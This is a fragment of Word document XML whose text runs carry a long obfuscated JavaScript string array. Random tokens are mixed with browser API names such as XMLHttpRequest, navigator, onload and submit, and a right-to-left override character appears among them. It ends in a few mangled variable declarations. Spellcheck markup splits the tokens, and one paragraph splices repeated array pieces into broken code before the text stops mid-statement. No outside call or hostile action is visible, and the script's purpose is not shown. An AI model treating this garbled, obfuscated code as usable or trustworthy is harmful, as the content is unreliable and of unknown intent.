      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "which", "8Z8DkBy47BS5kWxVHt6CcCnJsuaGHNAuv2cg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>isFinite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "CowoiE3w9QSGkEM0S8U", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>yFHcXIY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "4gL6ZIkTMv44QIiS3GMtsOxlNCo-", "VHnNef8UE5ZTCfE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>JRPcVrw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"vs1HhQGKjCPJ7GYFf-DYcX75koSnDg", "V9pPuAe2zizXoGs", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aqUexmiN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "start", "QmrhA5gOKw", "uM9b4iao1n3nqS0ORqbeaBOogcLOcfI43w", "33GIQ_tAWaNrKOaztUIuoehs", "performance", "console", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>decodeURIComponent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "XTj2XogcT5ISG9-TsRYzjdEeMXc", "6jy9dcFbdg", "mr1BtGLEjQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>axg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "iTPoeZk0LPstSA", "2hv-DY0DGqcZAs_mtWgs", "replace", "JluJSIZvLZxPdrTvu29Cp_t8Kjwk0T8", "Ftgei2PYxwXfpzMx", "left", "S9g53gSqsDvO5z5FBw", "OXuUFNB3X615QerGqSp68g", "ZlOte8pHOaZ_SaLBgB4V1rYx", "gsI-pF345wnYpAMUP9A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>charCodeAt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "1-5v_hXqo0A", "tWesfvtkIZhBX4i1uEs3ndBLVUIvrl4", "Uf8hnVG8", "IlTGXc5yPc5qWY2i1w", "-JEnhiKZ9GHKqBYEWKTUMwfXkObLOQ", "nDW2MsBlKLASDoU", "LP1cyTGU9mbbvX4nTP4", "7z2QUcBAYYQENPa7uw", "0-oi2GChgwE", "tLxPykuRskq2owNRXQ", "^https?:\\\x2F\\\x2F", "m1a_T4VDfJxWBJHBkGo", "c6xj2BGP2k-SglcGLcurGEiJqfOhAoBZp3wUJcmyfNI", "6vE8xHbFsHP0", "X4EyvHOy4jjm6mA7JuCYPQ6CsvD9", "1wH_EYYRDos", "Y5dcuWvEsCP_kipOH8WIehW_h97wTYpppRc", "-_cGwHvugBrYxQphPK65egiU-fTPBw", "_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ALafvxP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "JoAerg8", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SErfHKI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "L-MOlkflqwjd9CQzfMmibjzx5dDwBqAuug", "LZN-rwm31l-Nk0wDPNTgFUT_iemJLg", "mN9ukDuLlUrZh0sS", "split", "TRUE", "P6U6iHnc-VuoiSIn", "rUDgfI05SuxqBcOb5w", "_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xnkMOwsD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-QA", "8y2WPMViX7woO8-Q33EPp_E7EXkfqzT2Ag", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WjnwZtwe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eZQXvHrlnyk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "fYg5sH0", "description", "r8dU5CGmjg", "szHoa9cLF44QbNvf13kvig", "Jcpx-yD9jEq1", "d9w", "c5l66wm14Q2t", "aC-XFdxdYp8", "zyLEJ6wwIrMvJP_RikUZj8VtGAsutSzpBpn3ymg", "AhWuE511EK4HebbU8zB8kocLSA", "VIYx9k-EjQaa41g", "oHneEeAkDrlQeLzb9nNc5ecwMRUlhzL-YN3g9X9Erl4", "L0-1IsZ2Pr9gG5mZoypo-aUQKC5j4ULUc5S08G13zwM", "OYgF91bz2iSl9CQB", "done", "3zD2NIA1Ug", "qYMh03jhySI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>initCustomEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Uint8Array", "create", "Intl", "(?:)", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>unescape</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "di-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TXupMZZA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "EX7iAQ", "mark", "gnvzO9c", "p4EC7nb-", "rY9n7AE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sjTceA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "zNMWnX_KkDLh5g", "\uD83D\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uDCCA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jYxHyAE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zkbjQA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "mYMHkVHZ42SNsjEB", "1tVSthGkjw", "log", "head", "push", "constructor", "sin", "fs4knQ_B-Abh4X89P92qSWb5_a6TDQ", "uEHlbIswK7F8V9vL4ldnhYg", "2bMV0GXJ3yKTojdKC6SReCSv4_GnX_9uugA2bpvnMJFNGPzfj_-akEGeKJJqdQJ3gMQjxo9-2A", "6pdJn0yI6CuwungsHpKdfzk", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AvNA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "3M4V932vszHn9xg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>boolean</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "8AvjZ5k", "Xgb_f-0tCvQ7GQ", "KEzYL4kJOs9kZob8jA1f0aZuOzV68FXc", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NkKvQcZRQuBLTY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-x", "Rw6bN4JAaaMvC9uNpQE61w", "FO1mhwDM4iCDwHEeEpHyXw", "lTTSMbwrPOQjOO_n1VgVt9R-FExG8ySwDYyo4QcZ_Dg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>charAt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "imnhLZE2QcJcHA", "1", "cl3kFc9IHvtm", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DNEKhBLR-Hrvkg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "SMlA9UGJiV7NwThnR-vbLCmjjsKt", "0FnNSoYwP5RHffvo2m4", "3i_Ra7cqIe8mMLek", "LCM", "arguments", "JMAz0w-3tiLE-g", "4H7HD7sdOfFobaDZzl8WuuZqV0c2hjLuZZbk8AJH0Dg", "aGHrCYwnPuREBMLx6z5j5Q", "Mr50iiaM-A","writable", "MwK0OA", "kPZNqg-YilOM7g", "sV_wKIIGO8ttUc2l", "FHjmOIovJolgTdit-1h88g", "n91ZuCCxjlTlv2YvQu2cLEujh-6SOO0p", "JRGHVPRdL5Q", "cUTaIaAyDqJ0", "kQqmeMJ2b8kA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>className</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "UttJkXS5jibD5C1MS-Pdcme0ppU", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"event", "MkHzApF3dMJJE4M", "8MY", "PS7AXZl1AO8", "BhqpMvYVILw8PbDVyT0tva1TXQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>qrAK</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "PO1NmT-XuVGZ9z4", "TdIJj2i9zzKSxQ", "OkfGaeg0aORgKQ", "F5gnqATx0hCe6j9c", "t13MY_IGdcxAAcajw3k", "LwbtZM8rf9EPBY22", "onload", "HIVFgTT_30qQ", "viTBCaoOOfUPfLjS1kJEqOZvR0Ip3BbkZdeJp3YIvBA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>VdQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "1ErdX7NL", "7F3oaIg5RPdHC6WO6Q", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zeIO</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "5WCVR7dyRNsye-2umX5jlw", "filter", "0", "JECHA-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tTBKNlc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>qigw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>UegWyHbYqSE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "cFLpP9U_Zr8EJbiFrA", "i2-CIa9uGbQQFKc", "Y493pQSpyUbohUkTLOfnGiDfnPeJO5Y", "-_Y_5FPwjRjDz0R-fZugSB4", "u7pRx1CLnVqqvQ", "_55JmD-G_xQ", "\u202EYuuMIdcQn\u202D", "0oEvzW_G5RKN6w", "o9pJ9ynH0mT9oTM", "2LdO3CU", "ylamdcpDB7Zpcw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OWOqRuZFZqhK</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pBaKFMtA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "VR2GDMt6aPkQPbiKmj8FzPw_cUZ9gQ", "AoI5kgWF8yLXrwUy", "Infinity", "BNl-4kg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nftEuAGgnQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "DuZAhTCc-HL2t3UXQ96cMWv3hIu5Hr8xpUw4WNyYe_RYWqGX9fLTyxP4P-VJJ0Qv-ZZ4ks0Hzhg_rhRP", "AOAc13LA6S_SsQ", "Ccs3jEbbwR_G0FxkZJb7Sg", "RKlNq27j-BmOyEgzDujP", "3MIm-V7Tw2PK5xwk", "QRGDb81vEfEQd7jH", "V7835Fbw7Fi4kB13KZmkAQWY1fTRb8ARxiYVQ52gXw", "MW3iec5nEfBUDA", "m33DSLwAeuRdL6Wh00ML", "cCvROI9ZXg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RqhuyQKxjFiLhgUA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "navigator", "l8QoxGzUyQ", "j3TiOI4iMIkpGJ_FvQxpw4sSGSBo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>enctype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "click", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nEyGDcBFTpxUQA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "CJMD3iLukCi03n1zVQ", "znTKVaITZ6M", "xCveVasIBOg-ZKb1iQVL7rZ1HFAfgS32YN3l1RQPsSeUiTRnKz5QaMw75iHFx4A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WFqPDw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Xh7RGboeW-AxIO673wBd8LAxBw1t3Tr0Mse21WVF", "6BGPZ_5dfb0vcbyS", "Rf8bkQ", "lGv6MdsAZdVEK5KKu3o", "dASTXPRPTvwdOrrvizUBq6Ig", "70", "Vo1dph-spWKzpiw", "qpoZhyWL8w8", "FL9QrTecimer6DA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zALXOA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "all", "biXPVr4v", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getEntriesByName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "eCjmXp8XQsUeDA", "VEO4YNR8HZRoQoT8pD830IIUbXFatX_AWvM", "pNZ16QfzqlKalwlVe7P6TE7T_7uqK4kWiTYfMw", "cE-9Xd99", "y0qVAtRrOIhCfA", "-vNK1zS6nw", "9YNAwDa8sku9gW4O", "SXmDSMReS5dxAPw", "CZ9srEqN3U2vn1kKSpC6VhiJ1_vNOMAO0m4HD_XqVKsvPpqy9vTjvy6uWZ0wWmxG4q8ck7ki9RQL0hc2o3Deg1aKpd4IW0TfbCFlYqwMF9Wm", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nRfGSA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GGXfVswXKdQU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "PAHkLJQ5INQFENebtXAgydlafzsG-zq-Z_j1", "RtcvnjvNm2iR3m0CC-TdYmXIhZ2iM5xyvEJaDInSfsZYDv_prKv6xg2QXb0eEXcgiOw", "jWCiI8h-apR_", "muFugBuEslvNg0RlKKv_Sjms--XzUIVB8G87dqmkWbgtJ6mt9q_4", "OIp6_iCJjmu5", "Q55p0AGQ_g", "submit", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DOMContentLoaded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Float32Array", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NIkcymjQzDKF-mUFR_HLMg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "location", "\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uFFFD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uFFFD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[\x00\x00\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uFFFD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\x00\x00]\x00", "1tYQjGDUyg", "JTG3IQ", "height", "\u3297\uFE0F", "lTWLbJxpcoI1Xg", "pHelP7V8bPVbI4s", "gLMjwFzCsUmFzwljb-q4Hnne7brwHYQHtSVectjiWZBvVOs", "1k7YRq0aO_pnGKG_1A8L", "3WuPEe5XHLRtfeTIzGhfsuYwO0lb0GTpKA", "46Q5lxz5gSKN8jJdNpTrFgCHzpDyWIIR4gsRRsPgDg", "3sNy_ACl8l_Y","S9tC5Dzijg", "rLVK8TeR5nbH2k90", "IFKDFvlDWOB3", "CY1WtzunmSC85TpiV5GXdh_fkYOJb7s9zjsDBJazOqcEEQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>L_FNxQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "uBGnU4k2Uak4P-Pzow", "6HKeLeoRS4QdHJuy", "cmW0RZElYeoBTQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getOwnPropertyDescriptor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"JjWxEI9rcA", "k5gU", "avZD93Ha1Qg", "q4UCvAWn_3Xz", "k9Bixge5vUXO2nVsZoG3UjiH5KT3Vc1WgyhNdIvw", "jtFV0G_SrFI", "n0vdH-8lGNBGWo7vyw", "kNsen1TnyiQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>firstChild</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "xQ3XJrxwV98UFdKGsQIBquZ3XWl2xDj0Lvy8h34U3A", "SgyHTaRpV5MfMY_O_GJNrt09N1U", "eJh5x3OMlQ", "CNF_8RGg3w", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ElKAHeRGZvZ_ILM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>XQatErQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "MleUPd9lbg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>QbcGyz_R</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>x_peig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "JzznK4YhVNsSDIDH_hIl", "gyzEZLIgeOB8H8U", "MIAZ1iHGzSWO8nQVSvrB", "KuFms0eYtFv69SFDcOPPNw_gqIaqU7tHsQJ5MejeMskASrg", "status", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>KXaxFto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "TMxUiS6Q433krQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EmPhRpcIJA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "charset", "f5M2ijeC707Q", "prototype", "dgitc7VddtsjFt6MlBE4mpNTU2ZA", "07pKxTeIg2mtqDNDXLuAZjPj-MTJDaRqugZ7BOOhJw", "XxHiUvIMe6FRFq3J2gIXsq4Z", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HIZzoSOxjUs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "GfU-jU3ygAg", "capture", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>appendChild</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "9", "WyGhP9Q3M5IJTYiH-CJHyNxKYSB-8EvVUJ2Z6W4vyEv_", "9RGrE5sRYfhSN56g2Cheu79UFH9V", "uLBI4SfJ9Q", "zjqAOKcqUMJBD6CW-xpmgLN0BUl3mhQ", "jfIagXXNlzuPtT0", "tibcGbsVYuwLPPeGwVlUufFoDhQ83gGjP5fP4zJNjUaTh1VqHHkJDd8S-H-Ewg", "t_scsXj0pzDL8CxyWbTd", "open", "YE27A9ZINYU4EZy3wWka44N4Om1fqHKvWg", "-E_wRJwGKN9de-Lr6w", "Xr8O70mo", "\uD83C\uDF7C", "_VesN9lqI4dIAMeesUI9nsFZRDQ3uw-QWLCa4wZDz1Hotkts", "WMA8hzncwkrBx2I", "LiDQf-h1Kw", "wQKNVblWUL0MZvc", "dmzENKdrRr0NUueFlThxwclxMQ", "vCWDUL1q", "lvYs133FjA", "Array", "YhOoZ5JVNpR9CtG3mwJwnYBAXHlG8FeUFvGBmBA", "p1_hJ5I9", "oY0j6Ef2kgaf1SFRM5o", "XxTdHrwFRfw6OejEyBpb_aExMj9U1Dn4fA", "bQnUXe8EE586feLo4EEWs-c", "zX-XKo8", "LN4y8Q", "", "7J0cqEfAxCemtHo-cP-QKA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SOlqyQI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "HZ1Puw-6unCiuTovXtjNd1ixyZ6Rfep4w012WoCSP_IYVNzYn9Lfym_SDt9RIkw", "7CurUPh0c50fAA", "g0ezaMlqdrdHLNXZ7Dw", "n4F13An20A", "ibs0gRjv6x8", "NaMfyTPmul62-G5OZQ", "UadCgjmRyHiwwSVdU8_fKnGjj5zBH-p0tggHFP7BQ_5HQOI", "OcJSkDyWj0zW4j8", "uWHbOqFkf4w3XtmgrDVQ_PJoBytT8WG0f_XQpyFS2gijwjpTCUkTbLwQhC6L4q_tYA", "Wbd_sgC5qk7aqAU", "3Y4-zHvg", "h7J5uCQ", "Twi9Mdk9NMccS52a93F92cBXdg", "SjLYTNADCNE4KZU", "lc02yWXA70HfgWpUPLniSg", "zNNz0Aumrn7C3Ghn", "0XPaYOBaUcFmFL2Tvn0Tmw", "x4hY7DGP0mrAwVVk", "F5lIuzzu", "OEzqU_VfJ4Ed", "vulAtg6pkFbjsEppXbs", "Ci2SZddRVKoOWZWurVgeg813", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nzGxOaQZFpM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "rE6YRfkbLPsXMa_1jC8P7Q", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RangeError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "NLpxgj_Z9FiE", "every", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WOZipCg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "tt8mq178rTeCiQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "DSGEb6NITc85efDZtg", "Ieturl-a2U3ZmhRTEOa_HUfXlbSJZoNHmTBESrGzIq5zJey3rL-65nPrAdN2FTUfl-RDzfttsUpIm1xo4DWa2lWJ", "BXGWOK8pdpt3VNI", "q7QNkGjErg", "slice", "ausA8ySD7Cv5i1FsIP6oYCi7up20W_Ra-XQvcNCqYQ", "EBvPXrULS6oIYqT8", "P3b1fpc2KcFdEMTw-jdy06gDfDBg40ORDZ77_AxWw0Lw_kFcF3ttOaBAh0uv8KzdPD-EKz_4a7rIHrS8EugRH5AoTwbHmpsT8In__wKiplFk_Wtc4EMY1EAMqrdHMzc_2SV13TkxTi_0</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>u6Ukc826Klbbx6nrmIGn0GYoYGYmOWWamJVSWFqc5GGCsn4wHarWIHn6c20vJCOm4VtLEn-Kmor915KdQ-IDHbI62ZSbVlDdxc3dXG5L3WymJvnrSpEkQhhqUvDHzaUPshdR_A3OjYYWuAKt4vulzQ", "TZx2", "aCD6cfgnIqYG", "rz3HAqAOefcQIfmygXxVpvZlJ1Q4lyfjKYzl5RoNvwfFzx8AX1tMEcQJ8nnSr4qoRk2je0beX_7kD-DZSI8vD_kuCGCqseJ8nc2SxFS-r38M_xA5jwlu8zJMrcguV1tNrHky6QNGH06LoIBWNKXkaAvB-suj3fjWzTV7FBAAYwT16-BACVP-3Uyrkw", "M6B2iBrB_leciw", "JsgrnSLNk0yS3Wo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>trhIsmDGvlurxAEpcqrhJXs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "TrYYy3HMwg", "ceZIrlP5uEfHyFg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "iterator", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TOc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9A741A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt;     var d = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>RN(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>null);                                     ", "imnhLZE2QcJcHA", "1", "cl3kFc9IHvtm", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DNEKhBLR-Hrvkg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "SMlA9UGJiV7NwThnR-vbLCmjjsKt",  3M4V932vszHn9xg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>boolean</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "8AvjZ5k", "Xgb_f-0tCvQ7GQ", "KEzYL4kJOs9kZob8jA1f0aZuOzV68FXc", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NkKvQcZRQuBLTY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-x", "Rw6bN4JAaaMvC9uNpQE61w", "FO1mhwDM4iCDwHEeEpHyXw", "lTTSMbwrPOQjOO_n1VgVt9R-FExG8ySwDYyo4QcZ_Dg", "charAt"LbwG8", "D6YnlWrl8w", "LRLMTYU4Fus", "BFawKMF2cJ9BUM2Ip3I9itxbZz0ysxGPRe7esgA9gwO3oE53DChxKe9Fi0_qk9WONyjgNzzoY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F64F738" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt;     var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Rq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
